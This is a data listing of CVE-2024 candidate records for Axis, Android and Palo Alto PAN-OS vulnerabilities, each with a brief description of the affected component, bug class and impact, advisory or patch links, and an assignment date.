CVE    2024    54    Candidate    Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX APIs local_list.cgi, create_overlay.cgi and irissetup.cgi were vulnerable to file globbing which could lead to a resource exhaustion attack. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.    MISC:https://www.axis.com/dam/public/76/f3/1d/cve-2024-0054-en-US-432116.pdf   |   URL:https://www.axis.com/dam/public/76/f3/1d/cve-2024-0054-en-US-432116.pdf    Assigned (20231121)
CVE    2024    53    Candidate    In getCustomPrinterIcon of PrintManagerService.java, there is a possible way to view other user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/74b03835a7fac15e854d08159922418c99e27e77   |   URL:https://android.googlesource.com/platform/frameworks/base/+/74b03835a7fac15e854d08159922418c99e27e77   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    52    Candidate    In multiple functions of healthconnect, there is a possible leakage of exercise route data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/modules/HealthFitness/+/178f4824574fdf33ed4ac584d092240d1c771b04   |   URL:https://android.googlesource.com/platform/packages/modules/HealthFitness/+/178f4824574fdf33ed4ac584d092240d1c771b04   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    51    Candidate    In onQueueFilled of SoftMPEG4.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/av/+/a52c14a5b49f26efafa581dea653b4179d66909e   |   URL:https://android.googlesource.com/platform/frameworks/av/+/a52c14a5b49f26efafa581dea653b4179d66909e   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    50    Candidate    In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a missing validation check. This could lead to a local non-security issue with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/av/+/8f3bc8be16480367bac36effa25706133a0dc22d   |   URL:https://android.googlesource.com/platform/frameworks/av/+/8f3bc8be16480367bac36effa25706133a0dc22d   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    49    Candidate    In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/av/+/462689f06fd5e72ac63cd87b43ee52554ddf953e   |   URL:https://android.googlesource.com/platform/frameworks/av/+/462689f06fd5e72ac63cd87b43ee52554ddf953e   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    48    Candidate    In Session of AccountManagerService.java, there is a possible method to retain foreground service privileges due to incorrect handling of null responses. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/2c236cde5505ee0e88cf1e3d073e2f1a53f0eede   |   URL:https://android.googlesource.com/platform/frameworks/base/+/2c236cde5505ee0e88cf1e3d073e2f1a53f0eede   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    47    Candidate    In writeUserLP of UserManagerService.java, device policies are serialized with an incorrect tag due to a logic error in the code. This could lead to local denial of service when policies are deserialized on reboot with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/3cd8a2c783fc736627b38f639fe4e239abcf6af1   |   URL:https://android.googlesource.com/platform/frameworks/base/+/3cd8a2c783fc736627b38f639fe4e239abcf6af1   |   MISC:https://android.googlesource.com/platform/frameworks/base/+/bd5cc7f03256b328438b9bc3791c6b811a2f1f17   |   URL:https://android.googlesource.com/platform/frameworks/base/+/bd5cc7f03256b328438b9bc3791c6b811a2f1f17   |   MISC:https://android.googlesource.com/platform/frameworks/base/+/f516739398746fef7e0cf1437d9a40e2ad3c10bb   |   URL:https://android.googlesource.com/platform/frameworks/base/+/f516739398746fef7e0cf1437d9a40e2ad3c10bb   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    46    Candidate    In installExistingPackageAsUser of InstallPackageHelper.java, there is a possible carrier restriction bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c   |   URL:https://android.googlesource.com/platform/frameworks/base/+/d68cab5ac1aa294ec4d0419bc0803a5577e4e43c   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    45    Candidate    In smp_proc_sec_req of smp_act.cc, there is a possible out of bounds read due to improper input validation. This could lead to remote (proximal/adjacent) information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/7d0f696f450241d8ba7a168ba14fa7b75032f0c9   |   URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/7d0f696f450241d8ba7a168ba14fa7b75032f0c9   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    44    Candidate    In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/65bd134b0a82c51a143b89821d5cdd00ddc31792   |   URL:https://android.googlesource.com/platform/frameworks/base/+/65bd134b0a82c51a143b89821d5cdd00ddc31792   |   MISC:https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2   |   URL:https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-m7fh-f3w4-r6v2   |   MISC:https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html   |   URL:https://rtx.meta.security/exploitation/2024/03/04/Android-run-as-forgery.html   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    41    Candidate    In removePersistentDot of SystemStatusAnimationSchedulerImpl.kt, there is a possible race condition due to a logic error in the code. This could lead to local escalation of privilege that fails to remove the persistent dot with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/d6f7188773409c8f5ad5fc7d3eea5b1751439e26   |   URL:https://android.googlesource.com/platform/frameworks/base/+/d6f7188773409c8f5ad5fc7d3eea5b1751439e26   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    40    Candidate    In setParameter of MtpPacket.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/av/+/2ca6c27dc0336fd98f47cfb96dc514efa98e8864   |   URL:https://android.googlesource.com/platform/frameworks/av/+/2ca6c27dc0336fd98f47cfb96dc514efa98e8864   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    39    Candidate    In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/015c618a0461def93138173a53daaf27ca0630c9   |   URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/015c618a0461def93138173a53daaf27ca0630c9   |   MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/17044ccf3a2858633cad8f87926e752edfe0d8d8   |   URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/17044ccf3a2858633cad8f87926e752edfe0d8d8   |   MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/f0f35273101518d1f3a660b151804e90d0249af3   |   URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/f0f35273101518d1f3a660b151804e90d0249af3   |   MISC:https://source.android.com/security/bulletin/2024-03-01   |   URL:https://source.android.com/security/bulletin/2024-03-01    Assigned (20231116)
CVE    2024    38    Candidate    In injectInputEventToInputFilter of AccessibilityManagerService.java, there is a possible arbitrary input event injection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/3e88d987235f5a2acd50a9b6bad78dbbf39cb079   |   URL:https://android.googlesource.com/platform/frameworks/base/+/3e88d987235f5a2acd50a9b6bad78dbbf39cb079   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    37    Candidate    In applyCustomDescription of SaveUi.java, there is a possible way to view images belonging to a different user due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/55fc00a0788ea0995fe0851616b9ac21710a2931   |   URL:https://android.googlesource.com/platform/frameworks/base/+/55fc00a0788ea0995fe0851616b9ac21710a2931   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    36    Candidate    In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to bypass the restrictions on starting activities from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/3eaaa9687e90c65f51762deb343f18bef95d4e8e   |   URL:https://android.googlesource.com/platform/frameworks/base/+/3eaaa9687e90c65f51762deb343f18bef95d4e8e   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    35    Candidate    In onNullBinding of TileLifecycleManager.java, there is a possible way to launch an activity from the background due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/7b7fff1eb5014d12200a32ff9047da396c7ab6a4   |   URL:https://android.googlesource.com/platform/frameworks/base/+/7b7fff1eb5014d12200a32ff9047da396c7ab6a4   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    34    Candidate    In BackgroundLaunchProcessController, there is a possible way to launch arbitrary activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6   |   URL:https://android.googlesource.com/platform/frameworks/base/+/653f7b0d234693309dc86161af01831b64033fe6   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    33    Candidate    In multiple functions of ashmem-dev.cpp, there is a possible missing seal due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/native/+/aa98edf0ce9dde4886979658a459900ca987f193   |   URL:https://android.googlesource.com/platform/frameworks/native/+/aa98edf0ce9dde4886979658a459900ca987f193   |   MISC:https://android.googlesource.com/platform/system/core/+/46d46dc46446f14f26fbe8fb102dd36c1dfc1229   |   URL:https://android.googlesource.com/platform/system/core/+/46d46dc46446f14f26fbe8fb102dd36c1dfc1229   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    32    Candidate    In queryChildDocuments of FileSystemProvider.java, there is a possible way to request access to directories that should be hidden due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/4af5db76f25348849252e0b8a08f4a517ef842b7   |   URL:https://android.googlesource.com/platform/frameworks/base/+/4af5db76f25348849252e0b8a08f4a517ef842b7   |   MISC:https://android.googlesource.com/platform/packages/providers/DownloadProvider/+/5acd646e0cf63e2c9c0862da7e03531ef0074394   |   URL:https://android.googlesource.com/platform/packages/providers/DownloadProvider/+/5acd646e0cf63e2c9c0862da7e03531ef0074394   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    31    Candidate    In attp_build_read_by_type_value_cmd of att_protocol.cc, there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/de53890aaca2ae08b3ee2d6e3fd25f702fdfa661   |   URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/de53890aaca2ae08b3ee2d6e3fd25f702fdfa661   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    30    Candidate    In btif_to_bta_response of btif_gatt_util.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/57b823f4f758e2ef530909da07552b5aa80c6a7d   |   URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/57b823f4f758e2ef530909da07552b5aa80c6a7d   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    29    Candidate    In multiple files, there is a possible way to capture the device screen when disallowed by device policy due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/9b10fd9718f4e6f6843adbfc14e46a93aab93aad   |   URL:https://android.googlesource.com/platform/frameworks/base/+/9b10fd9718f4e6f6843adbfc14e46a93aab93aad   |   MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    23    Candidate    In ConvertRGBToPlanarYUV of Codec2BufferUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/av/+/30b1b34cfd5abfcfee759e7d13167d368ac6c268   |   URL:https://android.googlesource.com/platform/frameworks/av/+/30b1b34cfd5abfcfee759e7d13167d368ac6c268   |   MISC:https://source.android.com/security/bulletin/2024-01-01   |   URL:https://source.android.com/security/bulletin/2024-01-01    Assigned (20231116)
CVE    2024    21    Candidate    In onCreate of NotificationAccessConfirmationActivity.java, there is a possible way for an app in the work profile to enable notification listener services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/apps/Settings/+/53ea491d276f9a7c586c7983c08105a9bb7051f1   |   URL:https://android.googlesource.com/platform/packages/apps/Settings/+/53ea491d276f9a7c586c7983c08105a9bb7051f1   |   MISC:https://source.android.com/security/bulletin/2024-01-01   |   URL:https://source.android.com/security/bulletin/2024-01-01    Assigned (20231116)
CVE    2024    20    Candidate    In onActivityResult of NotificationSoundPreference.java, there is a possible way to hear audio files belonging to a different user due to a confused deputy. This could lead to local information disclosure across users of a device with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/apps/Settings/+/87f791f2351e366f842a0fd6fcb744069160d9a1   |   URL:https://android.googlesource.com/platform/packages/apps/Settings/+/87f791f2351e366f842a0fd6fcb744069160d9a1   |   MISC:https://source.android.com/security/bulletin/2024-01-01   |   URL:https://source.android.com/security/bulletin/2024-01-01    Assigned (20231116)
CVE    2024    19    Candidate    In setListening of AppOpsControllerImpl.java, there is a possible way to hide the microphone privacy indicator when restarting systemUI due to a missing check for active recordings. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/707fc94ec3df4cf6b985e6d06c2588690d1a025a   |   URL:https://android.googlesource.com/platform/frameworks/base/+/707fc94ec3df4cf6b985e6d06c2588690d1a025a   |   MISC:https://source.android.com/security/bulletin/2024-01-01   |   URL:https://source.android.com/security/bulletin/2024-01-01    Assigned (20231116)
CVE    2024    18    Candidate    In convertYUV420Planar16ToY410 of ColorConverter.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/av/+/bf6406041919f67219fd1829438dda28845d4c23   |   URL:https://android.googlesource.com/platform/frameworks/av/+/bf6406041919f67219fd1829438dda28845d4c23   |   MISC:https://source.android.com/security/bulletin/2024-01-01   |   URL:https://source.android.com/security/bulletin/2024-01-01    Assigned (20231116)
CVE    2024    17    Candidate    In shouldUseNoOpLocation of CameraActivity.java, there is a possible confused deputy due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/apps/Camera2/+/5c4c4b35754eef319dcd69c422f0b1ac0c823f6e   |   URL:https://android.googlesource.com/platform/packages/apps/Camera2/+/5c4c4b35754eef319dcd69c422f0b1ac0c823f6e   |   MISC:https://source.android.com/security/bulletin/2024-01-01   |   URL:https://source.android.com/security/bulletin/2024-01-01    Assigned (20231116)
CVE    2024    16    Candidate    In multiple locations, there is a possible out of bounds read due to a missing bounds check. This could lead to paired device information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/1d7ba7c8a205522f384e8d5c7c9f26a421cab5f1   |   URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/1d7ba7c8a205522f384e8d5c7c9f26a421cab5f1   |   MISC:https://source.android.com/security/bulletin/2024-01-01   |   URL:https://source.android.com/security/bulletin/2024-01-01    Assigned (20231116)
CVE    2024    15    Candidate    In convertToComponentName of DreamService.java, there is a possible way to launch arbitrary protected activities due to intent redirection. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.    MISC:https://android.googlesource.com/platform/frameworks/base/+/2ce1b7fd37273ea19fbbb6daeeaa6212357b9a70   |   URL:https://android.googlesource.com/platform/frameworks/base/+/2ce1b7fd37273ea19fbbb6daeeaa6212357b9a70   |   MISC:https://source.android.com/security/bulletin/2024-01-01   |   URL:https://source.android.com/security/bulletin/2024-01-01    Assigned (20231116)
CVE    2024    14    Candidate    In startInstall of UpdateFetcher.java, there is a possible way to trigger a malicious config update due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.    MISC:https://source.android.com/security/bulletin/2024-02-01   |   URL:https://source.android.com/security/bulletin/2024-02-01    Assigned (20231116)
CVE    2024    11    Candidate    A reflected cross-site scripting (XSS) vulnerability in the Captive Portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of an authenticated Captive Portal user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft.    MISC:https://security.paloaltonetworks.com/CVE-2024-0011   |   URL:https://security.paloaltonetworks.com/CVE-2024-0011    Assigned (20231109)
CVE    2024    10    Candidate    A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of a user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft.    MISC:https://security.paloaltonetworks.com/CVE-2024-0010   |   URL:https://security.paloaltonetworks.com/CVE-2024-0010    Assigned (20231109)
CVE    2024    9    Candidate    An improper verification vulnerability in the GlobalProtect gateway feature of Palo Alto Networks PAN-OS software enables a malicious user with stolen credentials to establish a VPN connection from an unauthorized IP address.    MISC:https://security.paloaltonetworks.com/CVE-2024-0009   |   URL:https://security.paloaltonetworks.com/CVE-2024-0009    Assigned (20231109)
CVE    2024    8    Candidate    Web sessions in the management interface in Palo Alto Networks PAN-OS software do not expire in certain situations, making it susceptible to unauthorized access.    MISC:https://security.paloaltonetworks.com/CVE-2024-0008   |   URL:https://security.paloaltonetworks.com/CVE-2024-0008    Assigned (20231109)
CVE    2024    7    Candidate    A cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a malicious authenticated read-write administrator to store a JavaScript payload using the web interface on Panorama appliances. This enables the impersonation of another authenticated administrator.    MISC:https://security.paloaltonetworks.com/CVE-2024-0007   |   URL:https://security.paloaltonetworks.com/CVE-2024-0007    Assigned (20231109)
 
